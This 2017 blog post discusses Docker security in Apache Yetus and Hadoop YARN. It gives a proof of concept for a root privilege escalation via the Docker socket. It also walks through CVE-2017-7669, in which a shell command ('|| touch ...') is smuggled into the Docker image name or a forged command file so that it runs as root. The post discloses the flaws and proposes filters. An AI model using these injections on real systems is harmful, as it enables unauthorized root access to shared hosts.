Docker Security in Framework Managed, Multi-user Environments

2017-06-02

A while back, Jessie Frazelle published an informative blog post on the differences between containers, zones, and jails. Since it touched on security, it reminded me of a conversation from last year, when a contributor to the Apache Yetus project asked about a Project Atomic blog post covering one of the bigger security issues with using Docker.

The TL;DR of the issue is that anything with access to dockerd’s socket can mount the root file system, or any other file system the daemon can access. The solution provided in the Project Atomic (aka Red Hat) blog was mainly that one should use sudo to limit the damage; in other words, wrap the docker command such that sudo specifies all of the parameters. Additionally, they proposed that dockerd should do some authorization to limit who can access it.
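To make the risk concrete: any account that can talk to dockerd can bind-mount the host’s / into a container and operate on it as root. A minimal demonstration (the busybox image is just an example, and this assumes the host has /bin/sh):

    $ docker run --rm -it -v /:/host busybox chroot /host /bin/sh
    # id
    uid=0(root) gid=0(root)

No sudo was involved; access to the Docker socket alone was enough.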

For many deployments, this proposed sudo solution probably works well. But for others, Docker and Linux containers are effectively used, much to Frazelle’s point, as a pseudo-VM solution. In fact, a growing number of frameworks that manage containers call the ‘docker’ executable directly and need more control over the command line to function properly. The sudo solution in these cases either doesn’t work or must be exercised with caution.

When using a framework, understand how it works and what those security issues might be!

Let’s talk about two of them.

Use Case 1: Apache Yetus

Apache Yetus is a set of independent libraries and tools that ultimately help the development process. They are particularly useful for large or open source projects where the community is geographically distributed, making it impractical to get everyone in the same room. One of its features is something called precommit. It is primarily used to QA patches and give feedback to humans, not only on unit tests but also on code formatting and other measures of quality. Since Apache Yetus is designed for use by lots of different projects that likely have different software requirements, it is logical to use something like Docker to provide those prerequisites.

The typical trigger for precommit is from within Jenkins, based upon changes from a bug tracking system such as JIRA or GitHub Issues. The command line parameters, minus the bug tracking system reference, are typically hard-coded as part of the Jenkins job. There is little-to-no direct user interaction. This means the attack surface comes mainly from the Jenkins environment and the user patch itself.

Apache Yetus deployments often use Docker. It is typical for a development project to include a Dockerfile in its source tree for QA work. As a project adds new requirements, modifying the build image is very simple, since the Dockerfile can get altered in the same commit. As a result, it isn’t unusual for patches that need testing to also make changes to the Dockerfile: part of our potential attack surface.

If we greatly simplify how precommit works and its internal processes, it typically looks like this:

  1. prework
  2. rewrite the Dockerfile to include some Yetus-specific bits
  3. docker build the Dockerfile
  4. docker build + custom bits for this run
  5. docker run, re-executing inside the container
  6. reset the source tree and do testing
  7. results

Step 5 is where the magic happens. The docker run command mounts a few custom volumes so that the build process has access to the source tree, artifact directories, the Maven cache directory, etc.
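A rough sketch of steps 3 through 5; the image tags, file names, host paths, and entry point here are all illustrative, not Yetus’s actual names:

    # step 3: build the rewritten Dockerfile (the project's own + Yetus bits)
    docker build -t project/yetus-base -f Dockerfile.yetus .

    # step 4: build again with the custom bits for this particular run
    docker build -t project/yetus-run -f Dockerfile.run .

    # step 5: re-execute inside the container, with the source tree,
    # artifact directory, and Maven cache mounted from the host
    docker run --rm \
      -v /home/jenkins/workspace/src:/src \
      -v /home/jenkins/workspace/patchdir:/patchdir \
      -v /home/jenkins/.m2:/root/.m2 \
      project/yetus-run /src/dev-support/run-tests.sh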

This process gives us great flexibility and allows a nice balance between static and dynamic needs. Unfortunately, it also makes the common solution of using sudo to protect the Docker command line difficult. Apache Yetus requires a lot more control over the volume parameters than a typical user would need. In particular, it mounts the source tree and various support directories inside the container.

In the majority of deployments, patches are only permitted to change the Dockerfile and not the Apache Yetus deployment itself. Mounting host-based file systems (such as /) is not supported from within Dockerfiles, so there is no direct exposure to the external environment. That leaves the problem of what can happen inside the Dockerfile (e.g., remote ssh, denial of service, bugs in containers, etc.). Given that we are effectively running user-provided code (as executed by the build system), those problems exist regardless of whether Docker is there or not.

What would happen if a user did break in via a hole in Jenkins? Apache Yetus expects to be able to call the docker command or an equivalent specified via a flag. That equivalent command could be used to filter options as necessary. Don’t want someone mounting / inside the container? Then build a filter for it, along the lines of the sketch below. This situation is less than ideal but better than nothing.
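A minimal sketch of such a filter, assuming the flag points at this wrapper instead of the real binary (the rejection rules here are illustrative and far from exhaustive):

    #!/usr/bin/env bash
    # Refuse any attempt to mount the host's / as a volume,
    # then hand everything else to the real docker binary.
    prev=""
    for arg in "$@"; do
      if [[ ( "$prev" == "-v" || "$prev" == "--volume" ) && "$arg" == /:* ]] ||
         [[ "$arg" == --volume=/:* || "$arg" == -v=/:* ]]; then
        echo "refusing to mount / inside a container" >&2
        exit 1
      fi
      prev="$arg"
    done
    exec /usr/bin/docker "$@"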

It’s worth mentioning, however, that Apache Yetus does have a known issue where passwords are currently stored in environment variables. YETUS-504 tracks a fix.

Use Case 2: Apache Hadoop

Apache Hadoop, by proper definition, is a file system (HDFS), an execution engine (YARN), a MapReduce implementation, and some common glue. There have been two attempts to add Docker support to YARN, with the latest being tracked by YARN-3611. The first release to feature parts of this work was Apache Hadoop 3.0.0-alpha1. (For the examples below, I will be using 3.0.0-alpha2.) It is crucial to note that this feature is considered pre-production and very experimental in quality.

One particular benefit of this version is the ability for users to specify an image within which to run their job. The command line, after a bit of server setup, looks something like this:
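(A reconstruction, using the stock MapReduce pi example; the jar path and exact property plumbing are illustrative of the 3.0.0-alpha2 era, while the YARN_CONTAINER_RUNTIME_* environment variables are the actual knobs the Docker runtime reads.)

    yarn jar hadoop-mapreduce-examples-3.0.0-alpha2.jar pi \
      -Dyarn.app.mapreduce.am.env="YARN_CONTAINER_RUNTIME_TYPE=docker,YARN_CONTAINER_RUNTIME_DOCKER_IMAGE=image" \
      -Dmapreduce.map.env="YARN_CONTAINER_RUNTIME_TYPE=docker,YARN_CONTAINER_RUNTIME_DOCKER_IMAGE=image" \
      -Dmapreduce.reduce.env="YARN_CONTAINER_RUNTIME_TYPE=docker,YARN_CONTAINER_RUNTIME_DOCKER_IMAGE=image" \
      10 100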

This example runs the pi code in an image called ‘image’.

If we greatly simplify it, under the hood the following is happening:

  1. user submits job specifying docker image name
  2. NodeManager sets up environment, creating directories, downloading image, etc.
  3. NodeManager spawns container-executor to finish setup
  4. NodeManager creates a shell script for the container-executor to launch
  5. NodeManager spawns container-executor to use the Docker launch script
  6. container-executor (running as root) runs the Docker launch script

On the surface, this looks somewhat reasonable. But it’s important to recognize that container-executor is a setuid program, and for those types of programs, input validation matters. Where can we inject our custom input? The obvious attack vector is the shell script: feeding user input into a bash program that runs as root is dangerous and a significant security anti-pattern.

Let’s start breaking this process down on a test system by first creating a wrapper. Move container-executor to ce-real, duplicating permissions as you go along. Then create a new container-executor program:
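(Something along these lines works, assuming the original binary now lives as ce-real next to the wrapper.)

    #!/usr/bin/env bash
    # log every set of arguments we receive, then run the real binary
    echo "$@" >> /tmp/logfile
    exec "$(dirname "$0")/ce-real" "$@"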

With this wrapper in place, container-executor’s parameters are now appended to /tmp/logfile. We’re particularly interested in the entries for command #4: the Docker container launch.

Read the source for more details on these parameters. For this exercise, concentrate on the second-to-last one: /tmp/hadoop-yarn/nm-docker-cmds/docker.container_1494886798647_0002_02_0000019129944638078956831.cmd.

YARN never deletes this file. Let’s open up this denial-of-service attack-in-waiting and see what it is:
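(A representative reconstruction; the exact contents vary with the job and cluster configuration, and every path and ID below is a placeholder.)

    run --name=container_1494886798647_0002_02_000001 --user=nobody
      --workdir=/hadoop/yarn/local/usercache/user/appcache/application_1494886798647_0002/container_1494886798647_0002_02_000001
      --net=host
      -v /hadoop/yarn/local:/hadoop/yarn/local
      -v /hadoop/yarn/log:/hadoop/yarn/log
      image bash /hadoop/yarn/local/usercache/user/appcache/application_1494886798647_0002/container_1494886798647_0002_02_000001/launch_container.sh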

(for clarity, I’ve inserted some breaks)

These are the command line arguments passed to the docker command. The NodeManager builds the file, not container-executor itself. This design means we can write our own version and have it executed.

container-executor requires a particular directory structure and must be executed as the YARN user; using an existing container makes this easier. For now, go ahead and become the YARN user (breaking into yarn is left as a different exercise), then do some manual setup so we can execute some things.

Now, let’s create our new script:
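(A reconstruction; the file name is illustrative, placed in the same directory the NodeManager uses for its own command files.)

    $ cat > /tmp/hadoop-yarn/nm-docker-cmds/evil.cmd <<'EOF'
    run || touch /tmp/neato
    EOF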

The actual parameters after the run do not really matter that much. In this specific example, the docker command will fail, but that’s ok. It will still run our ‘touch /tmp/neato’ as root:
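(Schematically; the easiest way to build the real invocation is to copy an entire command #4 entry from /tmp/logfile and swap our file in for the second-to-last argument.)

    $ ./container-executor <arguments copied from a logged #4 entry, with the
        second-to-last one replaced by /tmp/hadoop-yarn/nm-docker-cmds/evil.cmd>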

You’ll get the docker usage message and some other stuff, but it doesn’t matter:
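(Output reconstructed.)

    $ ls -l /tmp/neato
    -rw-r--r-- 1 root root 0 May 16 12:34 /tmp/neato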

OK, so we can run whatever we want as root. But that seems overly complicated. Is there an easier way? Why yes, yes there is. Due to the lack of input validation, a user can pass whatever they want directly from the CLI:
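(A reconstruction, reusing the pi job from earlier but smuggling a shell command in through the image “name”; the target file name is illustrative.)

    yarn jar hadoop-mapreduce-examples-3.0.0-alpha2.jar pi \
      -Dyarn.app.mapreduce.am.env="YARN_CONTAINER_RUNTIME_TYPE=docker,YARN_CONTAINER_RUNTIME_DOCKER_IMAGE=image || touch /tmp/still-root" \
      -Dmapreduce.map.env="YARN_CONTAINER_RUNTIME_TYPE=docker,YARN_CONTAINER_RUNTIME_DOCKER_IMAGE=image || touch /tmp/still-root" \
      -Dmapreduce.reduce.env="YARN_CONTAINER_RUNTIME_TYPE=docker,YARN_CONTAINER_RUNTIME_DOCKER_IMAGE=image || touch /tmp/still-root" \
      1 1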

… and then verification:
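(Output again reconstructed.)

    $ ls -l /tmp/still-root
    -rw-r--r-- 1 root root 0 May 16 12:40 /tmp/still-root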

… and there’s our file.

So how did this work? Effectively, the value of YARN_CONTAINER_RUNTIME_DOCKER_IMAGE passes through YARN’s RPC system to the NodeManager. The NodeManager then writes this value, unscathed, into the previously mentioned shell script. Before dropping root privileges, container-executor runs this shell script as root. The script ends up looking a lot like the one above; effectively, a version of:
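(Roughly; all other docker arguments elided.)

    /usr/bin/docker run ... image || touch /tmp/still-root ...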

In bash, || is the “or” operator: since the first command failed, the code after the || executes. In our hack above, that was a simple file creation. But root privileges expose full access to all system resources; we could have chosen to wipe out the entire OS (including the local logs), covering our tracks fairly effectively.

These discoveries, made while writing this blog post, turned into CVE-2017-7669. In the case of Apache Hadoop 3.0.0-alpha1 (and any other distributions that have YARN-3853 but not YARN-5704), there is no way to disable the Docker functionality, which means this security hole is ever-present.

Over a month after the vulnerability was disclosed to the ASF, Apache Hadoop 3.0.0-alpha3 (with Apache Hadoop 2.8.1 coming soon) has been released, primarily to fix these high-impact security holes. YARN now sanitizes Docker image names before writing the shell script. Some parameters are now classified as required, and single quotes surround all values for those parameters. However, there is no validation that the actual parameters are safe or valid. For example, it’s still possible to add or remove capabilities, mount various directories, change the user, and more.

Like Apache Yetus, Apache Hadoop does support configuring the docker command, via the undocumented docker.binary setting in container-executor.cfg. This setting allows one to put a filter in place to prevent harmful settings.
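For example, pointing the setting at a wrapper (the path is illustrative; the wrapper itself could be the same sort of filter sketched in the Yetus section):

    # container-executor.cfg
    docker.binary=/usr/local/sbin/docker-filter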

Commonality

The sudo trick doesn’t work for every situation. There is a very real need for some sort of ACL system for Docker at the system level. While I have mainly focused on the docker command itself, this also applies to talking to dockerd directly.

Therefore, in addition to the authentication proposed by Red Hat, users also need capabilities to limit access to certain resources post-authentication. For example, “a white list for directories usable in volumes by these users” would go a long way toward preventing accidental exposure. Longer term, an application that takes a raw Dockerfile and (quickly) turns it into an actual VM would be of tremendous benefit.

Some Advice

Docker is easily weaponized, and developers integrating with it need to be aware of that. Security must be at the forefront when working in multi-user environments. Developers should also be honest with their user base about potential risks and shortcomings to help prevent intrusions. It is important to acknowledge that this is a fast-changing technology: mistakes will be made as the features and capabilities change on a seemingly weekly basis.

Most importantly, administrators need to consider the risks of framework holes. Users need to hold their suppliers (both open source and commercial) accountable for stability and security information when dealing with Docker in these types of scenarios. For example, for Hadoop, the question is not “does feature x work with security” but “is feature x secure?”. Bugs happen, but issues in this space carry a lot of risk. Plan accordingly!
